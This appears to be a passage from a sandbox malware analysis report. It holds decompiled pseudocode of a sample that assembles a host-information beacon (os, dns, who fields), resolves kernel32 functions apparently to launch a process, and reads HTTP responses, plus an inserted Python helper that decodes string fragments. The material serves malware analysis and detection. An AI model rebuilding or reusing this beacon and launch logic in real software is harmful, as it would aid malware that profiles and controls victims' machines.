                				_t184 =  &(_t183[3]);
                				if(_t85 != 0) {
                					_t144 =  *0x222a348; // 0x9ad5a8
                					_t16 = _t144 + 0x222b8be; // 0x3d736f26
                					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
                					_t184 =  &(_t184[3]);
                					_t171 = _t171 + _t147;
                				}
                				_t86 = E0222472F(_t153);
                				_a32 = _t86;
                				if(_t86 != 0) {
                					_t139 =  *0x222a348; // 0x9ad5a8
                					_t19 = _t139 + 0x222b8d0; // 0x736e6426
                					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
                					_t184 =  &(_t184[3]);
                					_t171 = _t171 + _t142;
                					HeapFree( *0x222a2d8, 0, _a40);
                				}
                				_t87 = E02221340();
                				_a32 = _t87;
                				if(_t87 != 0) {
                					_t135 =  *0x222a348; // 0x9ad5a8
                					_t23 = _t135 + 0x222b8c5; // 0x6f687726
                					wsprintfA(_t171 + _t152, _t23, _t87);
                					_t184 =  &(_t184[3]);
                					HeapFree( *0x222a2d8, 0, _a40);
                				}
                				_t166 =  *0x222a3cc; // 0x2bd9600
                				_t89 = E02226B59(0x222a00a, _t166 + 4);
                				_t172 = 0;
                				_a16 = _t89;
                				if(_t89 == 0) {
                					L30:
                					HeapFree( *0x222a2d8, _t172, _t152);
                					return _a44;
                				} else {
                					_t92 = RtlAllocateHeap( *0x222a2d8, 0, 0x800);
                					_a24 = _t92;
                					if(_t92 == 0) {
                						L29:
                						HeapFree( *0x222a2d8, _t172, _a8);
                						goto L30;
                					}
                					E02222915(GetTickCount());
                					_t96 =  *0x222a3cc; // 0x2bd9600
                					__imp__(_t96 + 0x40);
                					asm("lock xadd [eax], ecx");
                					_t100 =  *0x222a3cc; // 0x2bd9600
                					__imp__(_t100 + 0x40);
                					_t102 =  *0x222a3cc; // 0x2bd9600
                					_t168 = E02226675(1, _t164, _t152,  *_t102);
                					asm("lock xadd [eax], ecx");
                					if(_t168 == 0) {
                						L28:
                						HeapFree( *0x222a2d8, _t172, _a16);
                						goto L29;
                					}
                					StrTrimA(_t168, 0x2229280);
                					_push(_t168);
                					_t108 = E02227563();
                					_v12 = _t108;
                					if(_t108 == 0) {
                						L27:
                						HeapFree( *0x222a2d8, _t172, _t168);
                						goto L28;
                					}
                					_t173 = __imp__;
                					 *_t173(_t168, _a8);
                					 *_t173(_a4, _v12);
                					_t174 = __imp__;
                					 *_t174(_v4, _v24);
                					_t175 = E02226536( *_t174(_v12, _t168), _v20);
                					_v36 = _t175;
                					if(_t175 == 0) {
                						_v8 = 8;
                						L25:
                						E022263F6();
                						L26:
                						HeapFree( *0x222a2d8, 0, _v40);
                						_t172 = 0;
                						goto L27;
                					}
                					_t118 = E02226F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
                					_v12 = _t118;
                					if(_t118 == 0) {
                						_t178 = _v24;
                						_v20 = E0222597D(_t178, _t175, _v16, _v12);
                						_t126 =  *((intOrPtr*)(_t178 + 8));
                						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
                						_t128 =  *((intOrPtr*)(_t178 + 8));
                						 *((intOrPtr*)( *_t128 + 8))(_t128);
                						_t130 =  *((intOrPtr*)(_t178 + 4));
                						 *((intOrPtr*)( *_t130 + 8))(_t130);
                						_t132 =  *_t178;
                						 *((intOrPtr*)( *_t132 + 8))(_t132);
                						E022261DA(_t178);
                					}
                					if(_v8 != 0x10d2) {
                						L20:
                						if(_v8 == 0) {
                							_t120 = _v16;
                							if(_t120 != 0) {
                								_t121 =  *_t120;
                								_t176 =  *_v12;
                								_v16 = _t121;
                								wcstombs(_t121, _t121,  *_v12);
                								 *_v24 = E0222673A(_v16, _v16, _t176 >> 1);
                							}
                						}
                						goto L23;
                					} else {
                						if(_v16 != 0) {
                							L23:
                							E022261DA(_v32);
                							if(_v12 == 0 || _v8 == 0x10d2) {
                								goto L26;
                							} else {
                								goto L25;
                							}
                						}
                						_v8 = _v8 & 0x00000000;
                						goto L20;
                					}
                				}
                			}
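The `// 0x…` comments the decompiler attaches to the `_t… + 0x222b…` pointer computations above are the first dword stored at that address, little-endian, so they read back as the leading bytes of the string each `wsprintfA` (or, in a later function, `GetModuleHandleA`/`GetProcAddress`) consumes: 0x74666f73 is "soft", 0x74707526 is "&upt", 0x3d736f26 is "&os=". The helper below is added here as an editorial example, not part of the sandbox output, to recover those fragments from a pasted excerpt of the decompilation. It yields only four bytes per string; the rest of each format string lives at the referenced offsets in the block pointed to by `*0x222a348` and is not on this page. The `SAMPLE` excerpt is copied from the listings on this page.

```python
import re
import struct

# Matches the "// 0x…" value comments the Joe Sandbox decompiler appends.
DWORD_COMMENT = re.compile(r"//\s*0x([0-9a-fA-F]{1,8})\b")


def decode_dword(value):
    """Read a 32-bit value as the little-endian bytes it was loaded from.

    Returns the printable text, or "" when the bytes are not a string
    fragment (a heap pointer such as 0x9ad5a8, a counter, a flag).
    """
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    # UTF-16LE fragment: odd bytes are NUL, e.g. 0x530025 -> L"%S"
    if raw[0] != 0 and raw[1] == 0 and raw[3] == 0:
        text = raw.decode("utf-16-le").rstrip("\x00")
    else:
        stripped = raw.rstrip(b"\x00")
        if not stripped:
            return ""
        text = stripped.decode("latin-1")
    if not all(0x20 <= ord(c) < 0x7F for c in text):
        return ""
    return text


def recover_fragments(decompiled_text):
    """Return (hex, text) pairs for every dword comment that decodes to
    text, in source order, so consecutive fragments read like the
    format string being assembled."""
    found = []
    for m in DWORD_COMMENT.finditer(decompiled_text):
        value = int(m.group(1), 16)
        text = decode_dword(value)
        if text:
            found.append(("0x%x" % value, text))
    return found


# Excerpt copied from the decompilation on this page: the format-string
# pointers handed to wsprintfA in the beacon-building function, then the
# "%sys"/"KERN" name fragments and the wide "%S" from the later functions.
SAMPLE = """\
_t3 = _t73 + 0x222b5ac; // 0x74666f73
_t4 = _t77 + 0x222b575; // 0x74707526
_t8 = _t148 + 0x222b508; // 0x732526
_t12 = _t81 + 0x222b246; // 0x74636126
_t16 = _t144 + 0x222b8be; // 0x3d736f26
_t19 = _t139 + 0x222b8d0; // 0x736e6426
_t23 = _t135 + 0x222b8c5; // 0x6f687726
_t77 =  *0x222a348; // 0x9ad5a8
_t18 = _t47 + 0x222b706; // 0x73797325
_t20 = _t50 + 0x222b3f6; // 0x4e52454b
_t28 = _t105 + 0x222bd10; // 0x530025
"""

if __name__ == "__main__":
    for hexval, text in recover_fragments(SAMPLE):
        print("%12s  %r" % (hexval, text))
```

Run against the excerpt, the wsprintfA fragments come out in call order as "soft", "&upt", "&%s", "&act", "&os=", "&dns", "&who": each call appends one `&name=value` piece to the buffer at `_t152`, which is what the running `_t169`/`_t170`/`_t171` offsets in the listing also show. The pointer 0x9ad5a8 is skipped because its bytes are not printable, which is the check that keeps the decoder from turning heap addresses into noise.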

                0x02222b91
                0x02222b91
                0x02222b95
                0x02222b9c
                0x02222ba6
                0x02222ba8
                0x02222ba8
                0x02222bb5
                0x02222bc0
                0x02222bc3
                0x02222bce
                0x02222bd1
                0x02222bd6
                0x02222bd9
                0x02222bde
                0x02222be1
                0x02222bed
                0x02222bfa
                0x02222bfc
                0x02222c02
                0x02222c07
                0x02222c12
                0x02222c14
                0x02222c17
                0x02222c1e
                0x02222c20
                0x02222c29
                0x02222c34
                0x02222c36
                0x02222c39
                0x02222c39
                0x02222c3b
                0x02222c40
                0x02222c40
                0x02222c48
                0x02222c4c
                0x02222c52
                0x02222c5d
                0x02222c5f
                0x02222c64
                0x02222c69
                0x02222c6c
                0x02222c71
                0x02222c7c
                0x02222c7e
                0x02222c81
                0x02222c81
                0x02222c83
                0x02222c8e
                0x02222c94
                0x02222c97
                0x02222c9c
                0x02222ca7
                0x02222ca9
                0x02222cb0
                0x02222cba
                0x02222cba
                0x02222cbc
                0x02222cc1
                0x02222cc7
                0x02222cca
                0x02222ccf
                0x02222cd9
                0x02222cdb
                0x02222cea
                0x02222cea
                0x02222cec
                0x02222cfa
                0x02222cff
                0x02222d01
                0x02222d07
                0x02222ee7
                0x02222eef
                0x02222efc
                0x02222d0d
                0x02222d19
                0x02222d1f
                0x02222d25
                0x02222eda
                0x02222ee5
                0x00000000
                0x02222ee5
                0x02222d31
                0x02222d36
                0x02222d3f
                0x02222d50
                0x02222d54
                0x02222d5d
                0x02222d63
                0x02222d70
                0x02222d7d
                0x02222d83
                0x02222ecd
                0x02222ed8
                0x00000000
                0x02222ed8
                0x02222d8f
                0x02222d95
                0x02222d96
                0x02222d9b
                0x02222da1
                0x02222ec3
                0x02222ecb
                0x00000000
                0x02222ecb
                0x02222dab
                0x02222db2
                0x02222dbc
                0x02222dc2
                0x02222dcc
                0x02222dde
                0x02222de0
                0x02222de6
                0x02222eff
                0x02222eae
                0x02222eae
                0x02222eb3
                0x02222ebf
                0x02222ec1
                0x00000000
                0x02222ec1
                0x02222df1
                0x02222df6
                0x02222dfc
                0x02222e07
                0x02222e12
                0x02222e16
                0x02222e1c
                0x02222e22
                0x02222e28
                0x02222e2b
                0x02222e31
                0x02222e34
                0x02222e39
                0x02222e3d
                0x02222e3d
                0x02222e4a
                0x02222e58
                0x02222e5d
                0x02222e5f
                0x02222e65
                0x02222e6b
                0x02222e6d
                0x02222e72
                0x02222e76
                0x02222e92
                0x02222e92
                0x02222e65
                0x00000000
                0x02222e4c
                0x02222e51
                0x02222e94
                0x02222e98
                0x02222ea2
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x02222ea2
                0x02222e53
                0x00000000
                0x02222e53
                0x02222e4a

                APIs
                • GetTickCount.KERNEL32 ref: 02222BA8
                • wsprintfA.USER32 ref: 02222BF5
                • wsprintfA.USER32 ref: 02222C12
                • wsprintfA.USER32 ref: 02222C34
                • wsprintfA.USER32 ref: 02222C5B
                • wsprintfA.USER32 ref: 02222C7C
                • wsprintfA.USER32 ref: 02222CA7
                • HeapFree.KERNEL32(00000000,?), ref: 02222CBA
                • wsprintfA.USER32 ref: 02222CD9
                • HeapFree.KERNEL32(00000000,?), ref: 02222CEA
                  • Part of subcall function 02226B59: RtlEnterCriticalSection.NTDLL(02BD95C0), ref: 02226B75
                  • Part of subcall function 02226B59: RtlLeaveCriticalSection.NTDLL(02BD95C0), ref: 02226B93
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02222D19
                • GetTickCount.KERNEL32 ref: 02222D2B
                • RtlEnterCriticalSection.NTDLL(02BD95C0), ref: 02222D3F
                • RtlLeaveCriticalSection.NTDLL(02BD95C0), ref: 02222D5D
                  • Part of subcall function 02226675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A0
                  • Part of subcall function 02226675: lstrlen.KERNEL32(00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A8
                  • Part of subcall function 02226675: strcpy.NTDLL ref: 022266BF
                  • Part of subcall function 02226675: lstrcat.KERNEL32(00000000,00000000), ref: 022266CA
                  • Part of subcall function 02226675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266E7
                • StrTrimA.SHLWAPI(00000000,02229280,?,02BD9600), ref: 02222D8F
                  • Part of subcall function 02227563: lstrlen.KERNEL32(02BD9C10,00000000,00000000,00000000,02223EF9,00000000), ref: 02227573
                  • Part of subcall function 02227563: lstrlen.KERNEL32(?), ref: 0222757B
                  • Part of subcall function 02227563: lstrcpy.KERNEL32(00000000,02BD9C10), ref: 0222758F
                  • Part of subcall function 02227563: lstrcat.KERNEL32(00000000,?), ref: 0222759A
                • lstrcpy.KERNEL32(00000000,?), ref: 02222DB2
                • lstrcpy.KERNEL32(?,?), ref: 02222DBC
                • lstrcat.KERNEL32(?,?), ref: 02222DCC
                • lstrcat.KERNEL32(?,00000000), ref: 02222DD3
                  • Part of subcall function 02226536: lstrlen.KERNEL32(?,00000000,02BD9E18,00000000,02226F0A,02BDA03B,43175AC3,?,?,?,?,43175AC3,00000005,0222A00C,4D283A53,?), ref: 0222653D
                  • Part of subcall function 02226536: mbstowcs.NTDLL ref: 02226566
                  • Part of subcall function 02226536: memset.NTDLL ref: 02226578
                • wcstombs.NTDLL ref: 02222E76
                  • Part of subcall function 0222597D: SysAllocString.OLEAUT32(?), ref: 022259B8
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                • HeapFree.KERNEL32(00000000,?), ref: 02222EBF
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02222ECB
                • HeapFree.KERNEL32(00000000,?,?,02BD9600), ref: 02222ED8
                • HeapFree.KERNEL32(00000000,?), ref: 02222EE5
                • HeapFree.KERNEL32(00000000,?), ref: 02222EEF
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
                • String ID:
                • API String ID: 1185349883-0
                • Opcode ID: e214c7db420c6baada295f496f99ef66ea3461b44d0b2e250a6b6f8e28911376
                • Instruction ID: d5ae22a1b72dd978328f527395c441b64a913340a5222048aeccced3f5725ae3
                • Opcode Fuzzy Hash: e214c7db420c6baada295f496f99ef66ea3461b44d0b2e250a6b6f8e28911376
                • Instruction Fuzzy Hash: 8FA18A71900325BFC721AFA4EC48E5A7BE9EF48714F161A28F848D7220D733E969DB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E02227238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				char _v20;
                				intOrPtr _v24;
                				signed int _v28;
                				intOrPtr _v32;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t58;
                				signed int _t60;
                				signed int _t62;
                				intOrPtr _t64;
                				intOrPtr _t66;
                				intOrPtr _t70;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                				intOrPtr _t80;
                				WCHAR* _t83;
                				void* _t84;
                				void* _t85;
                				void* _t86;
                				intOrPtr _t92;
                				intOrPtr* _t102;
                				signed int _t103;
                				void* _t104;
                				intOrPtr _t105;
                				void* _t107;
                				intOrPtr* _t115;
                				void* _t119;
                				intOrPtr _t125;
                
                				_t58 =  *0x222a3dc; // 0x2bd9cc0
                				_v24 = _t58;
                				_v28 = 8;
                				_v20 = GetTickCount();
                				_t60 = E02226ABD();
                				_t103 = 5;
                				_t98 = _t60 % _t103 + 6; // random length in 6..10
                				_t62 = E02226ABD();
                				_t117 = _t62 % _t103 + 6;
                				_v32 = _t62 % _t103 + 6;
                				_t64 = E022242E9(_t60 % _t103 + 6);
                				_v16 = _t64;
                				if(_t64 != 0) {
                					_t66 = E022242E9(_t117);
                					_v12 = _t66;
                					if(_t66 != 0) {
                						_push(5);
                						_t104 = 0xa;
                						_t119 = E0222398D(_t104,  &_v20);
                						if(_t119 == 0) {
                							_t119 = 0x222918c;
                						}
                						_t70 = E02225FA1(_v24);
                						_v8 = _t70;
                						if(_t70 != 0) {
                							_t115 = __imp__;
                							_t72 =  *_t115(_t119);
                							_t75 =  *_t115(_v8);
                							_t76 =  *_t115(_a4);
                							_t80 = E022233DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                							_v24 = _t80;
                							if(_t80 != 0) {
                								_t105 =  *0x222a348; // 0x9ad5a8
                								_t102 =  *0x222a138; // 0x2227ddd
                								_t28 = _t105 + 0x222bd10; // 0x530025
                								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                								_push(4);
                								_t107 = 5;
                								_t83 = E0222398D(_t107,  &_v20);
                								_a8 = _t83;
                								if(_t83 == 0) {
                									_a8 = 0x2229190;
                								}
                								_t84 =  *_t115(_a8);
                								_t85 =  *_t115(_v8);
                								_t86 =  *_t115(_a4);
                								_t125 = E022233DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                								if(_t125 == 0) {
                									E022261DA(_v24);
                								} else {
                									_t92 =  *0x222a348; // 0x9ad5a8
                									_t44 = _t92 + 0x222ba20; // 0x73006d
                									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                									 *_a16 = _v24;
                									_v28 = _v28 & 0x00000000;
                									 *_a20 = _t125;
                								}
                							}
                							E022261DA(_v8);
                						}
                						E022261DA(_v12);
                					}
                					E022261DA(_v16);
                				}
                				return _v28;
                			}

                0x0222723e
                0x02227246
                0x02227249
                0x02227256
                0x02227259
                0x02227260
                0x02227267
                0x0222726a
                0x02227277
                0x0222727a
                0x0222727d
                0x02227282
                0x02227287
                0x0222728f
                0x02227294
                0x02227299
                0x0222729f
                0x022272a3
                0x022272ac
                0x022272b0
                0x022272b2
                0x022272b2
                0x022272ba
                0x022272bf
                0x022272c4
                0x022272ca
                0x022272d1
                0x022272e2
                0x022272e9
                0x022272fb
                0x02227300
                0x02227305
                0x0222730e
                0x02227317
                0x02227320
                0x02227336
                0x0222733b
                0x0222733f
                0x02227343
                0x02227348
                0x0222734d
                0x0222734f
                0x0222734f
                0x02227359
                0x02227362
                0x02227369
                0x02227385
                0x02227389
                0x022273c2
                0x0222738b
                0x0222738e
                0x02227396
                0x022273a7
                0x022273af
                0x022273b7
                0x022273bb
                0x022273bb
                0x02227389
                0x022273ca
                0x022273ca
                0x022273d2
                0x022273d2
                0x022273da
                0x022273da
                0x022273e6

                APIs
                • GetTickCount.KERNEL32 ref: 02227250
                • lstrlen.KERNEL32(00000000,00000005), ref: 022272D1
                • lstrlen.KERNEL32(?), ref: 022272E2
                • lstrlen.KERNEL32(00000000), ref: 022272E9
                • lstrlenW.KERNEL32(80000002), ref: 022272F0
                • lstrlen.KERNEL32(?,00000004), ref: 02227359
                • lstrlen.KERNEL32(?), ref: 02227362
                • lstrlen.KERNEL32(?), ref: 02227369
                • lstrlenW.KERNEL32(?), ref: 02227370
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrlen$CountFreeHeapTick
                • String ID:
                • API String ID: 2535036572-0
                • Opcode ID: 399f9467768f92e17e2cec9b625e341d60a4f7aed640a4b5709857b7d33881cc
                • Instruction ID: beb96e3641cf5e7ed6d872bc08ead0f6e9d9be85793014383395cd8ca6da54ac
                • Opcode Fuzzy Hash: 399f9467768f92e17e2cec9b625e341d60a4f7aed640a4b5709857b7d33881cc
                • Instruction Fuzzy Hash: 95518E32D1022ABBCF11AFE5DC44A9E7BB6EF44314F154065F904AB260DB36DA29DF90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E022237DF(void* __eax, void* __ecx) {
                				long _v8;
                				char _v12;
                				void* _v16;
                				void* _v28;
                				long _v32;
                				void _v104;
                				char _v108;
                				long _t36;
                				intOrPtr _t40;
                				intOrPtr _t47;
                				intOrPtr _t50;
                				void* _t58;
                				void* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t71;
                
                				_t1 = __eax + 0x14; // 0x74183966
                				_t69 =  *_t1;
                				_t36 = E02226BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                				_v8 = _t36;
                				if(_t36 != 0) {
                					L12:
                					return _v8;
                				}
                				E02227AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                				_t40 = _v12(_v12);
                				_v8 = _t40;
                				if(_t40 == 0 && ( *0x222a300 & 0x00000001) != 0) {
                					_v32 = 0;
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					_v108 = 0;
                					memset( &_v104, 0, 0x40);
                					_t47 =  *0x222a348; // 0x9ad5a8
                					_t18 = _t47 + 0x222b706; // 0x73797325
                					_t68 = E0222127E(_t18);
                					if(_t68 == 0) {
                						_v8 = 8;
                					} else {
                						_t50 =  *0x222a348; // 0x9ad5a8
                						_t19 = _t50 + 0x222b86c; // 0x2bd8e14
                						_t20 = _t50 + 0x222b3f6; // 0x4e52454b
                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                						if(_t71 == 0) {
                							_v8 = 0x7f;
                						} else {
                							_v108 = 0x44; // STARTUPINFOA.cb = sizeof(STARTUPINFOA) on x86
                							E02225B56();
                							// 0x4000000 = CREATE_DEFAULT_ERROR_MODE; the argument layout and the two CloseHandle calls on the
                							// PROCESS_INFORMATION at _v32 are consistent with CreateProcessA (inferred; name not recovered here)
                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                							_push(1);
                							E02225B56();
                							if(_t58 == 0) {
                								_v8 = GetLastError();
                							} else {
                								CloseHandle(_v28);
                								CloseHandle(_v32);
                							}
                						}
                						HeapFree( *0x222a2d8, 0, _t68);
                					}
                				}
                				_t70 = _v16;
                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                				E022261DA(_t70);
                				goto L12;
                			}

                0x022237e7
                0x022237e7
                0x022237f6
                0x022237fd
                0x02223802
                0x0222390f
                0x02223916
                0x02223916
                0x02223811
                0x02223819
                0x0222381c
                0x02223821
                0x02223836
                0x0222383c
                0x0222383d
                0x02223840
                0x02223846
                0x02223849
                0x0222384e
                0x02223856
                0x02223862
                0x02223866
                0x022238f6
                0x0222386c
                0x0222386c
                0x02223871
                0x02223878
                0x0222388c
                0x02223890
                0x022238df
                0x02223892
                0x02223893
                0x0222389a
                0x022238b3
                0x022238b5
                0x022238b9
                0x022238c0
                0x022238da
                0x022238c2
                0x022238cb
                0x022238d0
                0x022238d0
                0x022238c0
                0x022238ee
                0x022238ee
                0x02223866
                0x022238fd
                0x02223906
                0x0222390a
                0x00000000

                APIs
                  • Part of subcall function 02226BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,022237FB,?,?,?,?,00000000,00000000), ref: 02226C1E
                  • Part of subcall function 02226BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02226C40
                  • Part of subcall function 02226BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02226C56
                  • Part of subcall function 02226BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02226C6C
                  • Part of subcall function 02226BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02226C82
                  • Part of subcall function 02226BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02226C98
                • memset.NTDLL ref: 02223849
                  • Part of subcall function 0222127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02223862,73797325), ref: 0222128F
                  • Part of subcall function 0222127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 022212A9
                • GetModuleHandleA.KERNEL32(4E52454B,02BD8E14,73797325), ref: 0222387F
                • GetProcAddress.KERNEL32(00000000), ref: 02223886
                • HeapFree.KERNEL32(00000000,00000000), ref: 022238EE
                  • Part of subcall function 02225B56: GetProcAddress.KERNEL32(36776F57,02222425), ref: 02225B71
                • CloseHandle.KERNEL32(00000000,00000001), ref: 022238CB
                • CloseHandle.KERNEL32(?), ref: 022238D0
                • GetLastError.KERNEL32(00000001), ref: 022238D4
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                • String ID:
                • API String ID: 3075724336-0
                • Opcode ID: 363d63f9a89187aac0638a80daa290da57932f2b26658c8c80be47a2001fe442
                • Instruction ID: ad6c808bbee5ad945331b9cfa982a0836998dce8a0d48cf7b930ec8c4a8a064c
                • Opcode Fuzzy Hash: 363d63f9a89187aac0638a80daa290da57932f2b26658c8c80be47a2001fe442
                • Instruction Fuzzy Hash: 1C3150B2D10229BFDB20EFE4DC88E9EBBBCEB08304F514465E605A7114D7369A5CCB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02223FA5(void* __ecx, void* __esi) {
                				long _v8;
                				long _v12;
                				long _v16;
                				long _v20;
                				long _t34;
                				long _t39;
                				long _t42;
                				long _t56;
                				void* _t58;
                				void* _t59;
                				void* _t61;
                
                				_t61 = __esi;
                				_t59 = __ecx;
                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                				do {
                					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                					_v20 = _t34;
                					if(_t34 != 0) {
                						L3:
                						_v8 = 4;
                						_v16 = 0;
                						// 0x20000013 = HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE: status code as a DWORD into _t61+0x2c
                						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                							_t39 = GetLastError();
                							_v12 = _t39;
                							if(_v20 == 0 || _t39 != 0x2ef3) { // 0x2ef3 = ERROR_INTERNET_INCORRECT_HANDLE_STATE (response not ready yet)
                								L15:
                								return _v12;
                							} else {
                								goto L11;
                							}
                						}
                						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                							goto L11;
                						} else {
                							_v16 = 0;
                							_v8 = 0;
                							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16); // 0x16 = HTTP_QUERY_RAW_HEADERS_CRLF, size probe
                							_t58 = E022233DC(_v8 + 1);
                							if(_t58 == 0) {
                								_v12 = 8;
                							} else {
                								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                									E022261DA(_t58);
                									_v12 = GetLastError();
                								} else {
                									 *((char*)(_t58 + _v8)) = 0;
                									 *(_t61 + 0xc) = _t58;
                								}
                							}
                							goto L15;
                						}
                					}
                					SetEvent( *(_t61 + 0x1c));
                					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                					_v12 = _t56;
                					if(_t56 != 0) {
                						goto L15;
                					}
                					goto L3;
                					L11:
                					_t42 = E022216B2( *(_t61 + 0x1c), _t59, 0xea60);
                					_v12 = _t42;
                				} while (_t42 == 0);
                				goto L15;
                			}















                APIs
                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74CF81D0,00000000,00000000), ref: 02223FBC
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02223F34,00000000,?), ref: 02223FCC
                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02223FFE
                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02224023
                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02224043
                • GetLastError.KERNEL32 ref: 02224055
                  • Part of subcall function 022216B2: WaitForMultipleObjects.KERNEL32(00000002,02227C47,00000000,02227C47,?,?,?,02227C47,0000EA60), ref: 022216CD
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                • GetLastError.KERNEL32(00000000), ref: 0222408A
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
